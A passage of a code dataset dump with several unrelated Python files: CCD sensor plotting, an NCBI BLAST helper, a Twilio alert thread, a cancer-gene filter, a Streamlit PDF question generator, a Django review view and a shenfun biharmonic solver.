\"R20_S02\",\n \"R20_S12\", \"R20_S22\", \"R30_S02\", \"R30_S12\", \"R30_S22\", \"R30_S21\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S00\", \"R30_S10\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S00\", \"R20_S20\", \"R20_S10\", \"R20_S00\", \"R20_S10\", \"R20_S20\", \"R30_S00\",\n# \"R30_S10\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S00\", \"R20_S20\", \"R20_S10\", \"R20_S00\", \"R20_S01\",\n# \"R20_S11\", \"R20_S21\", \"R30_S01\", \"R30_S11\", \"R30_S21\", \"R30_S20\"]\n\n#sensors = [\"R30_S11\", \"R30_S01\", \"R20_S21\", \"R20_S20\", \"R30_S00\", \"R30_S10\", \"R30_S20\", \"R30_S21\"]\n#sensors = [\"R30_S11\", \"R30_S10\", \"R30_S20\", \"R30_S21\"]\n\n#sensors = [\"R30_S21\", \"R30_S22\", \"R30_S21\"]\n\nif args.invert == \"yes\":\n sensors.reverse()\n\nstart_x = 0.\nstart_y = 0.\n\nrunning_x = start_x\nrunning_y = start_y\n\nprint(sensors[-1], 0., 0.)\nrot_angle = 0\ncur_sensor = sensors[-1] # assumes this is a loop with the starting point == ending point\n\nr0 = cur_sensor[0:3]\ns0 = cur_sensor[4:7]\n\ncy_0 = -2.5 * d_raft + (float(r0[1]) + 0.5) * d_raft + (float(s0[1]) - 1.) * d_sensor\ncx_0 = -2.5 * d_raft + (float(r0[2]) + 0.5) * d_raft + (float(s0[2]) - 1.) * d_sensor\n\norientation = \"\"\n\n# find the proper connecting measurement given the current sensor and standard\nfor ids, tgt_sensor in enumerate(sensors):\n idl = 0\n # find the connecting measurement for target and current sensor. idl is index into arrays.\n for ic, c in enumerate(names):\n if tgt_sensor in c:\n if cur_sensor in c:\n idl = ic\n break\n\n std_sign = 1. # account for direction between standard and target\n if tgt_sensor != st_name[idl]:\n std_sign = -1.\n\n dx0 = -x[idl] * std_sign\n dy0 = -y[idl] * std_sign\n\n dx = dx0 * math.cos(rot_angle) - dy0 * math.sin(rot_angle)\n dy = dx0 * math.sin(rot_angle) + dy0 * math.cos(rot_angle)\n\n # apply rotation to the deltas, but only after the first connection\n\n rot_angle -= std_sign*sdiff[idl]\n\n r0 = tgt_sensor[0:3]\n s0 = tgt_sensor[4:7]\n\n cy_m.append(-2.5 * d_raft + (float(r0[1]) + 0.5) * d_raft + (float(s0[1]) - 1.) * d_sensor)\n cx_m.append(-2.5 * d_raft + (float(r0[2]) + 0.5) * d_raft + (float(s0[2]) - 1.) * d_sensor)\n\n focal_plane.line([cx_0, dx + cx_0],\n [cy_0, dy + cy_0],\n line_color=\"red\", line_width=2)\n\n cx_0 += dx\n cy_0 += dy\n\n running_x += dx\n running_y += dy\n\n dx_m.append(cx_0 - cx_m[ids])\n dy_m.append(cy_0 - cy_m[ids])\n dist_m = math.hypot(cx_0 - cx_m[ids], cy_0 - cy_m[ids])\n\n print(tgt_sensor, names[idl], running_x, running_y, \" \",\n st_name[idl], std_sign, sdiff[idl], rot_angle, orient[idl], dx, dx0, dy, dy0, dx_m[ids], dy_m[ids], dist_m)\n\n cur_sensor = tgt_sensor\n\nfx = figure(tools=TOOLS, title=\"x diffs to centers\", x_axis_label='sensor count',\n y_axis_label='pixels')\nfy = figure(tools=TOOLS, title=\"y diffs to centers\", x_axis_label='sensor count',\n y_axis_label='pixels')\n\nfx.vbar(top=dx_m, x=range(len(dx_m)), width=1, fill_color='red', fill_alpha=0.2)\nfy.vbar(top=dy_m, x=range(len(dy_m)), width=1, fill_color='red', fill_alpha=0.2)\n\nout_lay = layout(focal_plane, row(fx, fy))\n\noutput_file(args.output + \"CCD_locations.html\")\nsave(out_lay, title=\"CCD grid locations\")\n","sub_path":"python/run_ccd_locations.py","file_name":"run_ccd_locations.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"511748033","text":"import os\nimport uuid\n\nfrom Bio.Blast import NCBIWWW\n\nfrom blast_local.utils import BLAST\n\n\nclass BLASTNcbi(BLAST):\n \"\"\"\n Class to handle duties related to blast against sequences in NCBI Genbank.\n \"\"\"\n def __init__(self, voucher_code, gene_code):\n self.voucher_code = voucher_code\n self.gene_code = gene_code\n self.e_value = 0.001\n self.cwd = os.path.dirname(__file__)\n self.query_file = os.path.join(self.cwd,\n 'db',\n 'query_' + uuid.uuid4().hex + '.fas',\n )\n self.output_file = os.path.join(self.cwd,\n 'db',\n 'output_' + uuid.uuid4().hex + '.xml',\n )\n\n def do_blast(self):\n \"\"\"\n Does a blast against NCBI and saves returned XML file to local disk.\n \"\"\"\n with open(self.query_file) as handle:\n fasta_string = handle.read()\n\n result_handle = NCBIWWW.qblast('blastn', 'nt', fasta_string)\n\n with open(self.output_file, 'w') as writer:\n writer.write(result_handle.read())\n result_handle.close()\n","sub_path":"voseq/blast_ncbi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"634304771","text":"\"\"\"\nnotificationthread.py - Handles the transmission of alerts to subscribers.\n\"\"\"\n__version__ = \"0.0.1\"\n__author__ = \"Thomas J. Daley, J.D.\"\n__date__ = \"13 SEP 2017\"\n\nimport logging\nfrom threading import Thread\n\nfrom twilio.rest import Client\n\nfrom cloudlib.conf import Config\n\nclass NotificationThread(Thread):\n \"\"\"\n This class queues notifications either through SMTP or TWILIO.\n \"\"\"\n def __init__(self, queue):\n ''' Initialize this thread. '''\n Thread.__init__(self)\n self.queue = queue\n self.logger = logging.getLogger(\"sb.cloud.noxT\")\n\n account_sid = Config.TWILIO_ACCOUNT_SID\n auth_token = Config.TWILIO_AUTH_TOKEN\n self.sms_client = Client(account_sid, auth_token)\n self.from_number = Config.TWILIO_FROM_NUMBER\n\n\n def run(self):\n ''' Retrieve items and send them to subscribers. '''\n while True:\n queued_alert = self.queue.get()\n self.logger.debug(\"Dequeued alert %d\", queued_alert.item_id)\n for subscriber in queued_alert.subscribers:\n if subscriber.is_ok_to_send_sms(queued_alert.alert.type_value):\n try:\n # If we have both a preview and a full URL, then transmit\n # the alert as MMS with both URLs.\n if queued_alert.full_url and queued_alert.preview_url:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message() + \\\n \"\\r\\n\" + queued_alert.full_url,\n media_url=queued_alert.preview_url)\n\n # If all we have is the thumbnail, then transmit an MMS\n # with the thumbnail image, but no link to the full image.\n elif queued_alert.preview_url:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message(),\n media_url=queued_alert.preview_url)\n\n # If all we have is a URL to the full image, then transmit\n # an SMS message with the message and the link to the full\n # image, but not MMS with a thumbnail.\n elif queued_alert.full_url:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message() + \\\n \"\\r\\n\" + queued_alert.full_url)\n\n # Finally, if we have no URLs, then just send an SMS with\n # the text of the message.\n else:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message())\n\n subscriber.set_last_sms_time(queued_alert.alert.type_value)\n # pylint: disable=W0703,C0103\n # Catching a general exception b/c the Twilio API is not clear\n # as to what exceptions can be thrown here. /tjd/\n except Exception as e:\n self.logger.error(\"Unabled to send SMS to %s: %s\",\n subscriber.mobile_number, e)\n\n if subscriber.is_ok_to_send_email(queued_alert.alert.type_value):\n try:\n self.logger.debug(\n \"Would send email to %s (%s)\",\n subscriber.email,\n subscriber.get_last_email_sent_time(queued_alert.alert.type_value))\n subscriber.set_last_email_time(queued_alert.alert.type_value)\n # pylint: disable=W0703,C0103\n # Catching a general exception b/c I don't know what exceptions\n # can be thrown here. /tjd/\n except Exception as e:\n self.logger.error(\"Unable to send email to %s: %s\", subscriber.email, e)\n\n self.queue.task_done()\n","sub_path":"cloudlib/notificationthread.py","file_name":"notificationthread.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"176101953","text":"def CancerGene(inF):\n D = {}\n inFile = open('/mnt/larsix/projects/NMD/hansun/Data/COSMIC/COSMIC_CancerGene_Census.txt')\n head = inFile.readline()\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n D[fields[0]] = 1\n inFile.close()\n\n inFile = open(inF)\n ouFile = open(inF + '_CancerGene', 'w')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n genes = fields[0].split(':')\n if genes[0] in D or genes[1] in D:\n ouFile.write(line + '\\n')\n inFile.close()\n ouFile.close()\n\nCancerGene('TCGA_IntergenicRegion_Table_TopN7_NumTumor7_HighExp')\n","sub_path":"lincRNAs/IntergenicRegions/TumorVsAdjacent/09-CancerGene.py","file_name":"09-CancerGene.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492102342","text":"import streamlit as st\nimport re\nimport torch\nfrom transformers import AutoModelForTokenClassification, AutoTokenizer, AutoModelWithLMHead\nimport spacy \nimport en_core_web_sm\nimport fitz\nfrom operator import itemgetter\nimport copy\nimport base64\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef bimg2utf(bimg):\n return base64.b64encode(bimg).decode('utf8')\n\nMAX_LENGTH = int(10000)\ndef adjust_length_to_model(length, max_sequence_length):\n if length < 0 and max_sequence_length > 0:\n length = max_sequence_length\n elif 0 < max_sequence_length < length:\n length = max_sequence_length # No generation bigger than model size\n elif length < 0:\n length = MAX_LENGTH # avoid infinite loop\n return length\n\n@st.cache\ndef generate_questions(answers, context, max_length=64):\n tokenizer = AutoTokenizer.from_pretrained(\"mrm8488/t5-base-finetuned-question-generation-ap\")\n model = AutoModelWithLMHead.from_pretrained(\"mrm8488/t5-base-finetuned-question-generation-ap\")\n model.to(device)\n \n qa_pairs = []\n for answer in answers:\n input_text = \"answer: %s context: %s </s>\" % (answer, context)\n\n features = tokenizer([input_text], return_tensors='pt')\n output = model.generate(input_ids=features['input_ids'].to(device), \n attention_mask=features['attention_mask'].to(device),\n max_length=max_length)\n question = tokenizer.decode(output[0])[10:]\n qa_pairs.append((question, answer))\n\n return qa_pairs\n\ndef unique(sequence):\n seen = set()\n return [x for x in sequence if not (x in seen or seen.add(x))]\n\n@st.cache\ndef generate_keywords(text):\n \n nlp = en_core_web_sm.load()\n doc = nlp(text)\n words = [str(x) for x in doc]\n labels = [str(x.ent_type_) for x in doc]\n ents, names = [], []\n for i, (word, label) in enumerate(zip(words, labels)):\n if label == '':\n continue\n elif labels[i]==labels[i-1]:\n ents[-1]+=' '+word\n else:\n ents.append(word)\n names.append(label)\n return unique(ents)\n\n\n\ndef _fonts(doc, granularity=True):\n \"\"\"Extracts fonts and their usage in PDF documents.\n :param doc: PDF document to iterate through\n :type doc: <class 'fitz.fitz.Document'>\n :param granularity: also use 'font', 'flags' and 'color' to discriminate text\n :type granularity: bool\n :rtype: [(font_size, count), (font_size, count}], dict\n :return: most used fonts sorted by count, font style information\n \"\"\"\n styles = {}\n font_counts = {}\n\n for page in doc:\n blocks = page.getText(\"dict\")[\"blocks\"]\n for b in blocks: # iterate through the text blocks\n if b['type'] == 0: # block contains text\n for l in b[\"lines\"]: # iterate through the text lines\n for s in l[\"spans\"]: # iterate through the text spans\n if granularity:\n identifier = \"{0}_{1}_{2}_{3}\".format(s['size'], s['flags'], s['font'], s['color'])\n styles[identifier] = {'size': s['size'], 'flags': s['flags'], 'font': s['font'],\n 'color': s['color']}\n else:\n identifier = \"{0}\".format(s['size'])\n styles[identifier] = {'size': s['size'], 'font': s['font']}\n\n font_counts[identifier] = font_counts.get(identifier, 0) + 1 # count the fonts usage\n\n font_counts = sorted(font_counts.items(), key=itemgetter(1), reverse=True)\n\n if len(font_counts) < 1:\n raise ValueError(\"Zero discriminating fonts found!\")\n\n return font_counts, styles\n\ndef _font_tags(font_counts, styles):\n \"\"\"Returns dictionary with font sizes as keys and tags as value.\n :param font_counts: (font_size, count) for all fonts occuring in document\n :type font_counts: list\n :param styles: all styles found in the document\n :type styles: dict\n :rtype: dict\n :return: all element tags based on font-sizes\n \"\"\"\n p_style = styles[font_counts[0][0]] # get style for most used font by count (paragraph)\n p_size = p_style['size'] # get the paragraph's size\n\n # sorting the font sizes high to low, so that we can append the right integer to each tag \n font_sizes = []\n for (font_size, count) in font_counts:\n if re.search('\\_', font_size):\n font_size = font_size.split('_')[0]\n font_sizes.append(float(font_size))\n font_sizes.sort(reverse=True)\n\n # aggregating the tags for each font size\n idx = 0\n size_tag = {}\n for size in font_sizes:\n idx += 1\n if size == p_size:\n idx = 0\n size_tag[size] = '<p>'\n if size > p_size:\n size_tag[size] = '<h{0}>'.format(idx)\n elif size < p_size:\n size_tag[size] = '<s{0}>'.format(idx)\n\n return size_tag\n\ndef _flags_read(flags):\n \"\"\"Make font flags human readable.\"\"\"\n l = []\n\n if flags & 2 ** 4:\n l.append(\"bold\")\n\n if flags & 2 ** 1:\n l.append(\"italic\")\n\n if flags & 2 ** 0:\n l.append(\"superscript\")\n\n# if flags & 2 ** 2:\n# l.append(\"serifed\")\n# else:\n# l.append(\"sans\")\n# if flags & 2 ** 3:\n# l.append(\"monospaced\")\n# else:\n# l.append(\"proportional\")\n return l\n\nclass PDF:\n def __init__(self, granularity=True):\n self.granularity = granularity\n self.font_counts = None\n self.font_styles = None\n self.font_tags = None\n \n\n \n def __call__(self, path):\n \"\"\"Scrapes headers & paragraphs from PDF and return texts with element tags.\n :param doc: PDF document to iterate through\n :type doc: <class 'fitz.fitz.Document'>\n :param self.font_tags: textual element tags for each size\n :type self.font_tags: dict\n :rtype: list\n :return: texts with pre-prended element tags\n \"\"\"\n doc = fitz.open(path)\n self.font_counts, self.font_styles = _fonts(doc)\n self.font_tags = _font_tags(self.font_counts, self.font_styles)\n \n pages = {} # list with headers and paragraphs\n first = True # boolean operator for first header\n previous_s = {} # previous span\n prev_bold = False\n\n for j, page in enumerate(doc):\n blocks = page.getText(\"dict\")[\"blocks\"]\n \n for image_index, img in enumerate(page.getImageList(), start=1):\n # get the XREF of the image\n xref = img[0]\n # extract the image bytes\n base_image = doc.extractImage(xref)\n image_bytes = base_image[\"image\"]\n image_ext = base_image[\"ext\"]\n \n if j+1 in pages:\n pages[j+1].append('{}{}'.format('<im>', bimg2utf(image_bytes)))\n else:\n pages[j+1] = ['{}{}'.format('<im>', bimg2utf(image_bytes))]\n \n for b in blocks: # iterate through the text blocks\n if b['type'] == 0: # this block contains text\n block_string = \"\" # text found in block\n for l in b[\"lines\"]: # iterate through the text lines\n span_length = len(l[\"spans\"])\n \n for i, s in enumerate(l[\"spans\"]): # iterate through the text spans\n final_span = i==span_length-1\n \n if s['text'].strip(): # removing whitespaces:\n text = s['text'].strip()\n text_size = s['size']\n text_bold = 'bold' in _flags_read(s['flags'])\n bold_end = False\n \n if first:\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n \n first = False\n block_string = self.font_tags[text_size] + text\n prev_size = text_size\n prev_bold = text_bold if not bold_end else False\n else:\n if text_size == prev_size:\n \n if block_string == \"\" or block_string and all((c == \"|\") for c in block_string):\n # new block or block_string only contains pipes, so append size tag\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n \n block_string = self.font_tags[text_size] + text\n\n else: # in the same block, so concatenate strings\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n elif prev_bold:\n block_string +='</b>'\n bold_end = True\n \n block_string += \" \" + text\n else:\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n \n if len(block_string)>0 and re.search('[a-zA-Z0-9]', block_string):\n if j+1 in pages:\n pages[j+1].append(re.sub(r'\\s+',' ', block_string))\n else:\n pages[j+1] = [re.sub(r'\\s+',' ', block_string)]\n block_string = self.font_tags[text_size] + text\n prev_size = text_size\n prev_bold = text_bold if not bold_end else False\n # new block started, indicating with a pipe\n block_string += \"|\"\n\n if len(block_string)>0 and re.search('[a-zA-Z0-9]', block_string):\n if j+1 in pages:\n pages[j+1].append(re.sub(r'\\s+',' ', block_string))\n else:\n pages[j+1] = [re.sub(r'\\s+',' ', block_string)]\n\n image_list = page.getImageList()\n \n pages_split = {}\n \n for k,content in pages.items():\n pages_split[k] = []\n for line in content:\n if re.search(r'\\.{4}', line):\n pages_split[k] += [line.strip()]\n else:\n tag = re.search('\\<.{1,3}\\>', line).group()\n for split in re.split('\\|{2,10}', line):\n if len(split)>0:\n if re.search(r'(?<=\\>).+', split) is None:\n pages_split[k] += ['{}{}'.format(tag, split.strip())]\n else:\n pages_split[k] += [split.strip()]\n \n return pages_split\n \n\n\nclass TMparser:\n def __init__(self, pages, images=False):\n self.pages = pages\n self.content, self.page_ref = self.aggregate_content(images)\n self.toc = self.get_toc()\n self.sections_clean, self.sections_dirty, self.sections_discard = self.make_sections()\n self.sections_final = self.make_section_nums()\n self.sections_final_cxt = self.make_context(self.sections_final)\n \n def get_page(self, num):\n assert num in self.page_ref\n start, end = self.page_ref[num]\n return self.content[start:end]\n \n def get_section(self, num, stype='clean'):\n if stype=='clean':\n title = list(self.sections_clean.keys())[num]\n return title, self.sections_clean[title]\n elif stype=='dirty':\n title = list(self.sections_dirty.keys())[num]\n return title, self.sections_dirty[title]\n elif stype=='discard':\n title = list(self.sections_discard.keys())[num]\n return title, self.sections_discard[title]\n \n def aggregate_content(self, images):\n content = []\n page_ref = {}\n \n for k,v in self.pages.items():\n start = len(content)\n if images:\n content+=v\n else:\n content+=[x for x in v if not x.startswith('<im>')]\n end = len(content)\n page_ref[k] = (start, end)\n return content, page_ref\n \n def get_toc(self):\n toc_raw = []\n num = ''\n \n for i, line in enumerate(self.content):\n prev_line = self.content[i-1] if i>0 else ''\n next_line = self.content[i+1] if i<i<len(self.content)-1 else ''\n \n line = re.sub(r'\\<b\\>|\\<\\/b\\>', '', re.sub('\\|+', '|', re.search(r'(?<=\\>).+', line).group()))\n \n if re.search(r'^[a-zA-Z]+\\s[0-9]+[^\\.\\,0-9]+$|^[0-9]+\\s[a-zA-Z]+[^\\.\\,0-9]+$', line) and (\n re.search(r'\\.{4}', prev_line) or \n re.search(r'\\.{4}', next_line)):\n num = re.search(r'[0-9]+', line).group()\n print(line, num)\n \n if re.search(r'\\.{4}', line) is not None:\n if re.search('^[0-9]', line) is None:\n line = '{} {}'.format(num, line)\n if len(re.findall(r'\\.{4}[a-zA-Z0-9\\s\\-\\–\\(\\)]', line))>1:\n toc_raw += re.split(r'(?<=[0-9]\\|)\\s', line)\n else:\n toc_raw.append(line)\n\n toc = []\n for line in toc_raw:\n renum = re.search(r'^[0-9\\.\\-\\–]*(?=\\s)', line)\n num = '' if renum is None else renum.group().strip()\n name = re.search(r'(?<=^{}).+?(?=\\.\\.\\.)'.format(re.escape(num)), line).group().strip()\n page = re.search(r'(?<=\\.\\.\\.)[^\\.]*[a-zA-Z0-9]+[0-9\\.\\-\\–\\s]{0,5}(?=\\|$)', line).group().strip()\n \n toc.append((num, name, page))\n return toc\n \n def _sections(self):\n sections = []\n start = 0\n\n for section, name, page in self.toc:\n name_tag = re.escape(re.search('.+(?=\\:)|.+(?=\\|)|.+$', name).group())\n\n found_name = False\n for i, line in enumerate(self.content[start:]):\n if re.search(r'\\.{4}', line):\n continue\n \n text_tags = re.findall('(?<=\\<b\\>).+?(?=\\<\\/b\\>)', line)\n text_tags += [re.sub(r'\\<b\\>|\\<\\/b\\>', '', re.search(r'(?<=\\>).+', line).group())]\n \n for text_tag in text_tags:\n if re.search('^[a-zA-Z\\(\\)\\-\\–\\.]{1,4}\\s|^[0-9\\(\\)\\-\\–\\.]{2,6}\\s', text_tag):\n text_tag = re.search('(?<=\\s).*', text_tag).group()\n\n if re.search(r'^{}'.format(name_tag), text_tag):\n found_name = True\n sections.append((i+start, name, line))\n start+=i\n break\n if found_name:\n break\n\n if not found_name and page.isdigit():\n idx1, idx2 = self.page_ref[int(page)]\n name_tag = re.escape(re.search('.+?(?=\\s)|.+$', name).group().lower())\n for j, line in enumerate(self.content[idx1:idx2]):\n text_tag = re.sub(r'\\<b\\>|\\<\\/b\\>', '', re.search(r'(?<=\\>).+', line).group()).lower()\n if re.search(r'{}'.format(name_tag), text_tag):\n found_name = True\n sections.append((j+idx1, name, line))\n break\n if not found_name: \n sections.append((-1, name, -1))\n return sections\n \n def _clean_section(self, section):\n clean, dirty = [], []\n for sec in section:\n sec = re.sub(r'\\uf0a7', '', re.search(r'(?<=\\>).+', sec).group().replace('|', '')).strip()\n numbers = sum(c.isdigit() for c in sec)\n letters = sum(c.isalpha() for c in sec)\n \n if (re.search('^\\<b\\>.+\\<\\/b\\>$', sec) or re.search(r'\\.{4}', sec) \n or letters<=25 or (numbers+10e-5)/(letters+10e-5)>0.3) and not re.search(r'^[a-z]', sec):\n dirty.append(sec)\n else:\n clean.append(re.sub(r'\\<b\\>|\\<\\/b\\>', '', sec))\n return clean, dirty\n \n def _super_clean(self, section):\n clean = []\n for sec in section:\n subsec = re.split(r'\\s(?=\\•)', sec) if re.search(r'\\s\\•', sec) else [sec]\n for sub in subsec:\n if re.search(r'^[a-z]', sub) and len(clean)>0:\n clean[-1]+=' {}'.format(sub)\n else:\n clean.append(sub)\n return clean\n \n \n def make_sections(self):\n sections_clean, sections_dirty, section_discard = {}, {}, {}\n \n _sections = [x for x in self._sections() if x[0]>0]\n for i, (idx,name,_) in enumerate(_sections):\n \n idx_next = _sections[i+1][0] if i<len(_sections)-1 else len(self.content)-1\n \n clean, dirty = self._clean_section(self.content[idx:idx_next])\n \n if len(''.join(clean))>100:\n sections_clean[name] = self._super_clean(clean)\n sections_dirty[name] = dirty\n else:\n section_discard[name] = clean+dirty\n \n if idx_next<idx:\n print(name)\n break\n return sections_clean, sections_dirty, section_discard\n \n def make_section_nums(self):\n section_nums = {}\n for x in self.toc:\n if x[1] in section_nums:\n pass\n else:\n section_nums[x[1]] = x[0]\n \n section_nums_clean = {}\n \n for k in self.sections_clean:\n section_nums_clean[k] = section_nums[k].replace('-', '.').strip('.')\n \n all_nums = list(section_nums_clean.values())\n existing_nums = [x for x in all_nums if len(x)>0]\n \n if len(existing_nums)==0:\n for k,v in zip(list(section_nums_clean.keys()), list(range(len(all_nums)))):\n section_nums_clean[k] = v\n elif len(all_nums[0])==0:\n fill_num = int(existing_nums[0][0])-1\n sub_num = 0\n for k,v in section_nums_clean.items():\n if len(v)>0:\n break\n else:\n section_nums_clean[k]='{}.{}'.format(fill_num, sub_num)\n sub_num+=1\n elif all_nums[0]==all_nums[1]:\n prev_num = all_nums[0]\n sub_num = 0\n \n for k,v in section_nums_clean.items():\n if v==prev_num:\n section_nums_clean[k]='{}.{}'.format(v, sub_num)\n sub_num+=1\n else:\n sub_num=0\n section_nums_clean[k]='{}.{}'.format(v, sub_num)\n \n sections_clean_numbered = {}\n for k,v in self.sections_clean.items():\n sections_clean_numbered['{} {}'.format(section_nums_clean[k], k)] = v\n return sections_clean_numbered\n \n def make_context(self, sections):\n sections_cxt = {}\n sections_copy = copy.deepcopy(sections)\n for k,v in sections_copy.items():\n cxt = ''\n for line in v:\n if re.search(r'\\s[a-z]+\\s', line):\n if re.search('^[0-9\\(\\)\\-\\–\\.]{1,6}\\s', line):\n line = re.search('(?<=\\s).*', line).group()\n cxt += ' {}'.format(re.sub(r'[^a-zA-Z0-9\\s\\(\\)\\*\\'\\\"\\.\\,\\;\\?\\!\\-\\/]+', '', line))\n sections_cxt[k] = re.sub(r'\\(.{1,17}\\)', '', cxt)\n return sections_cxt\n\ndef pdf_analyzer(path):\n pdfparser = PDF()\n pdfdict = pdfparser(path)\n return TMparser(pdfdict)\n \ndef wrap_by_word(s, n):\n '''returns a string where \\\\n is inserted between every n words'''\n a = s.split()\n ret = ''\n for i in range(0, len(a), n):\n ret += ' '.join(a[i:i+n]) + '\\n '\n\n return ret\n\n@st.cache\ndef pretty_print(content, n):\n for i in range(len(content)):\n content[i] = wrap_by_word(content[i], n)\n return content\n \n \nimport glob\n \ndef run():\n data_paths = glob.glob('data/DoD/*')\n data_names = [re.search('(?<=\\\\\\).+(?=\\.[pdfPDF]{3}$)', x).group() for x in data_paths]\n text_sources = dict(zip(data_names, data_paths))\n text_parser = {}\n text_final = {}\n text_cxt = {}\n \n name = st.sidebar.selectbox(\"Choose technical manual\", list(text_sources.keys()), 0)\n text_parser[name] = pdf_analyzer(text_sources[name])\n text_final[name] = text_parser[name].sections_final\n text_cxt[name] = text_parser[name].sections_final_cxt\n \n sec = st.sidebar.selectbox(\"Choose section\", list(text_final[name].keys()), 0)\n content = text_final[name][sec]\n context = text_cxt[name][sec]\n \n st.header('Keyword-Based Question Generator')\n st.markdown('***First our entity recognition algorithm searches for key words in the content below. Then our question generator creates questions for which the key words are the answers. Click the button below to give it a try!***')\n \n num_q = st.slider('Number of questions to generate', 0, 20, 8)\n if st.button(\"Generate Questions\"):\n ents = generate_keywords(context)[:num_q]\n if len(ents)>0:\n qa_pairs = generate_questions(ents, context)\n for q, a in qa_pairs:\n st.text('Question: {}\\nAnswer: {}'.format(wrap_by_word(q, 10).strip('\\n '), a))\n else:\n st.markdown('***Unfortunately no key words were found in this section. Try running this on a section with more substantive content, or try entering your own key words below!***')\n\n st.header('User-Assisted Question Generator')\n st.markdown('***If you enter your own answers in the text box below, our question generator will create a corresponding question.***')\n \n user_answer = st.text_area(\"Enter answer\", \"\")\n if st.button(\"Get Question\"):\n qa_pairs_user = generate_questions([user_answer], context)\n q_user, a_user = qa_pairs_user[0]\n st.text('Question: {}\\nAnswer: {}'.format(wrap_by_word(q_user, 10).strip('\\n '), a_user))\n \n st.header(name)\n st.subheader(sec)\n \n st.text('\\n'.join(pretty_print(content, 10)))\n\nif __name__ == \"__main__\":\n run()","sub_path":"demo_dod.py","file_name":"demo_dod.py","file_ext":"py","file_size_in_byte":24044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132513959","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom courses.forms import ReviewForm\nfrom courses.models import Review, Course\nfrom django.contrib.auth.decorators import login_required\nimport datetime\n\n\n@login_required\ndef AddReviewView(request, course_slug):\n course = get_object_or_404(Course, slug=course_slug)\n form = ReviewForm(request.POST)\n review_qr = Review.objects.filter(user=request.user, course=course)\n if review_qr.exists():\n messages.warning(request, 'You already reviewed on this course')\n return redirect('courses:course-detail', course_slug)\n else:\n if form.is_valid():\n rating = form.cleaned_data['rating']\n comment = form.cleaned_data['comment']\n review = Review()\n review.course = course\n review.pub_date = datetime.datetime.now()\n review.user = request.user\n review.comment = comment\n review.rating = rating\n review.save()\n messages.success(request, 'Successfully reviewed')\n return redirect('courses:course-detail', course_slug)\n return render(request, 'courses/course_detail.html', {'form': form, 'course': course})\n","sub_path":"courses/views/add_review.py","file_name":"add_review.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"221011984","text":"r\"\"\"\nSolve Biharmonic equation in 2D with periodic bcs in one direction\nand homogeneous Dirichlet and Neumann in the other\n\n \\nabla^4 u = f,\n\nUse Fourier basis for the periodic direction and Shen's Biharmonic\nbasis for the non-periodic direction.\n\n\"\"\"\nimport sys\nimport os\nfrom sympy import symbols, cos, sin, chebyshevt, pi\nimport numpy as np\nfrom shenfun import inner, div, grad, TestFunction, TrialFunction, Array, \\\n Function, TensorProductSpace, FunctionSpace, comm, la, chebyshev\n\n# Collect basis and solver from either Chebyshev or Legendre submodules\nfamily = sys.argv[-1].lower() if len(sys.argv) == 2 else 'chebyshev'\nBiharmonicSolver = chebyshev.la.Biharmonic if family == 'chebyshev' else la.SolverGeneric1ND\n\n# Use sympy to compute a rhs, given an analytical solution\nx, y = symbols(\"x,y\", real=True)\na = 1\nb = -1\nif family == 'jacobi':\n a = 0\n b = 0\nue = (sin(2*pi*x))*(1-x**2) + a*(1/2-9/16*x+1/16*chebyshevt(3, x)) + b*(1/2+9/16*x-1/16*chebyshevt(3, x))\n#ue = (sin(2*np.pi*x)*cos(2*y))*(1-x**2) + a*(0.5-0.6*x+1/10*legendre(3, x)) + b*(0.5+0.6*x-1./10.*legendre(3, x))\nfe = ue.diff(x, 4) + ue.diff(y, 4) + 2*ue.diff(x, 2, y, 2)\n\n# Size of discretization\nN = (30, 30)\n\nif family == 'chebyshev':\n assert N[0] % 2 == 0, \"Biharmonic solver only implemented for even numbers\"\n\nbcs = (ue.subs(x, -1), ue.subs(x, 1), ue.diff(x, 1).subs(x, -1), ue.diff(x, 1).subs(x, 1))\n#SD = FunctionSpace(N[0], family=family, bc='Biharmonic')\nSD = FunctionSpace(N[0], family=family, bc=bcs)\nK1 = FunctionSpace(N[1], family='F')\nT = TensorProductSpace(comm, (SD, K1), axes=(0, 1))\n\nu = TrialFunction(T)\nv = TestFunction(T)\n\n# Get f on quad points\nfj = Array(T, buffer=fe)\n\n# Compute right hand side of biharmonic equation\nf_hat = inner(v, fj)\n\n# Get left hand side of biharmonic equation\nmatrices = inner(v, div(grad(div(grad(u)))))\n\nu_hat = Function(T) # Solution spectral 